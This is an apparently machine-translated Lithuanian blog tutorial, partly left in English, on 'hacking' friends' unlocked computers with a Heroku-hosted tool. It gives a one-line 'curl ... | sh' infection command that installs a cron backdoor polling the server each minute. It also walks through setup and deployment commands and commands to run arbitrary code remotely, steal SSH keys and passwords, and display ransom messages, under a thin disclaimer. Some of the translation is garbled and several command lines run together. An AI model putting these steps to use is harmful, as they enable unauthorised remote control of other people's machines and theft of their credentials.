Kaip nulaužti draugus

Mano draugai dažnai palieka kompiuterius atidarytus ir atrakintus. Aš sakau jiems, kad jie tikriausiai turėtų įprasti užrakinti savo kompiuterius, bet jie manęs neklauso. Taigi sukūriau paprastą projektą, norėdamas nulaužti draugus ir parodyti jiems kompiuterio saugumo svarbą.

Viskas, ką man reikia padaryti, tai palaukti, kol jie kelias sekundes paliks neužrakintą kompiuterį, atidaryti terminalą ir įvesti vieną trumpą komandą.

Viskas! Jų kompiuteris yra užkrėstas ir nuotoliniu būdu šiame kompiuteryje galiu vykdyti visas norimas komandas. Gana miela, tiesa? O galbūt šokiruoja?

Įsilaužimas yra neteisėtas. Tiksliau:

„Tyčia prieiti prie kompiuterio be leidimo arba viršyti įgaliotąją prieigą“ - Kompiuterių sukčiavimo ir piktnaudžiavimo įstatymas (18 USC 1030)

Taigi nepamirškite, kad šio straipsnio tikslas yra parodyti, kaip lengva būtų įsilaužti asmeniui, turinčiam blogų ketinimų, kad galėtumėte išvengti įsilaužimo patys.

Sunaikinti jūsų gyvenimą nereikia įsilaužėlių genijaus - bet kuris „scenarijų vaikas“, galintis gauti fizinę prieigą prie jūsų kompiuterio, gali jus pakenkti atsisiųsdamas scenarijų, kuriame yra tik 50 eilučių kodo.

Gaunama sąranka

Visas šio projekto kodas yra šioje saugykloje, jei norite patekti tiesiai į apačią, bet toliau paaiškinsiu, kaip visa tai veikia.

Pirma, jums tiesiog reikia klonuoti atpirkimą, įdiegti jo priklausomybes ir susieti „ Hack“ komandinės eilutės sąsajos (CLI) įrankį.

git clone //github.com/ccorcos/hack.gitgit remote remove origincd hacknpm installnpm link

Tada turite sukonfigūruoti „Heroku“, kad jame būtų scenarijai, kurie bus paleisti jūsų draugų kompiuteryje. Jei dar niekada nenaudojote „Heroku“, prisiregistruokite čia (tai nemokama!) Ir nustatykite savo CLI įrankį savo kompiuteryje.

brew install heroku-toolbeltheroku login

Dabar „ Hack Repo“ viduje sukurkite „Heroku“ programą su lengvai įsimenamu pavadinimu. Aš naudoju „ hakerį-chet“.

heroku create hacker-chet

Tada turite paleisti komandą, kad atliktumėte nedidelę sąranką. Visa tai tikrai daro vis root URL Heroku svetainėje ir išleisti jį į savo package.json . Tokiu būdu serveris gali įterpti programos URL į apvalkalo scenarijus.

npm run init

Jei norite įsilaužti ir išbandyti viską, galite paleisti serverį vietoje.

npm start

Arba galite dislokuoti Heroku.

npm run deploy

Dabar esate pasirengęs nulaužti!

„Hack“ API

Šios programos grožis yra tas, kad norint pradėti ką nors nulaužti, tiesiog reikia paleisti vieną komandą jo mašinoje.

curl /hack | sh

ROOT_URL yra konkretus kelias į jūsų programą. Kai serverį naudojate lokaliai, tai bus localhost: 5000, o kai diegsite „Heroku“, tai bus kažkas panašaus į .herokua pp.com.

Tai sukuria „cron“ užduotį - „chronologinį darbą“, kuris tam tikru metu pakartoja užduotis - kiekvieną minutę priblokuoti / env / live galinį tašką ir pateikti rezultatą sh . Tai iš tikrųjų gana paprasta! Ir „Heroku“ suteikia jums HTTPS nemokamai, todėl jo „saugumas“ teisingas?

Įsilaužę į savo draugą, visa kita galite padaryti naudodami komandų eilutės įrankį iš savo kompiuterio.

Hack įrankis turi įvairias buvo įsilaužta aplinkoje sampratą. Įsilaužus kam nors naudojant / nulaužimo galinį tašką, jis pradeda veikti tiesioginėje aplinkoje. Kiekvienai aplinkai galite paleisti įvairias komandas. Aš viską pademonstruosiu su nedideliu žingsniu.

Toliau bus perrašytas tiesioginės aplinkos apvalkalo scenarijus, kad būtų vykdoma ši komanda, kuri garsiai pasakys „Aš tave stebiu“.

hack live exec "say 'I\'m watching you'"

Na, tai dar neveiks, vis tiek turite iš naujo įdiegti savo „Heroku“ programą.

hack deploy

Dabar palaukite kitos minutės ir stebėkite, kaip draugo kompiuteris bando jūsų serverį, įvesdamas serverio žurnalus.

hack logs

Visa aplinkos esmė yra ta, kad vienu metu galite nulaužti kelis žmones. Norint izoliuoti žmones skirtingose ​​aplinkose, tereikia pakeisti vardą.

hack live rename jon

Kitą kartą, kai tiesioginė aplinka bus pinguojama, ji perrašys „cron“ užduotį, kad vietoj jos pradėtų pinguoti „ jon“ aplinkoje.

Viską galite padaryti vienodai, tik pakeisdami aplinkos argumentą.

hack jon exec "say 'hello jon'"

Dabar, jei tą dieną jau pakankamai smagiai praleidote ir vakarėlis baigėsi, galite pamiršti Joną ir patikinti, kad jį „įsilaužėte“.

hack jon forget

Tai ištrins „Cron“ darbą iš jų kompiuterio. Arba galbūt norėsite šią aplinką tiesiog perjungti į miegamosios vietos režimą, kad vėliau galėtumėte ją atkurti.

hack jon interval 1d

Now, rather than pinging your server every minute (the default), it will ping every day at midnight. And when you want to wake it back up, you can change the interval back to every minute and the next day, you’re good to go!

hack jon interval 1m

Some other fun things to do are setting up additional cron jobs. Here’s how you can wake your friend up at 6am every morning to remind him about computer security.

hack jon cron "0 6 * * * say 'good morning jon, remember what I told you about locking your computer?'"

P.S. If you don’t remember how cron jobs work, this is a great resource. It pretty much all comes down to this little diagram.

* * * * *| | | | || | | | || | | | +---- Day of the Week (range: 1-7, 1 standing for Monday)| | | +------ Month of the Year (range: 1-12)| | +-------- Day of the Month (range: 1-31)| +---------- Hour (range: 0-23)+------------ Minute (range: 0-59)

One of my favorites is the desktop preset which will download an image from a given URL and set it as the background photo.

hack jon preset desktop //i.imgur.com/5FC2r9R.jpg

And if you’ve written a ton of cron jobs and you don’t know what’s on there anymore, you can use the dump command.

hack jon dump "crontab -l"

Dabar išplakite žurnalus ir pamatysite kito pingo išvestį. Tai iš tikrųjų dabar yra daug baisiau, kai galite susigrąžinti informaciją. Jei norite būti niekšiškesnis, galite ieškoti iššifruotų slaptažodžių arba pavogti jų ssh raktus.

hack jon preset passwordshack jon preset ssh

Bet jei jūs tiesiog norite jam suteikti gerą senamadišką išgąsdinimą, atsiųskite jam išpirkos pranešimą!

hack jon preset ransom "Hello Jon, I told you not to leave your computer unlocked."

Galiausiai, jei pastebite, kad pridėjote daugybę „Cron“ darbų ir norite tiesiog pradėti iš naujo, čia yra padėti iš naujo.

hack jon reset

Dabar eikite (atsakingai) linksminkitės su šiuo dalyku ir praneškite man, kokie yra jūsų mėgstamiausi išdaigai, pateikdami traukimo užklausą su nauja komanda ar iš anksto nustatyta!

Laimingo įsilaužimo!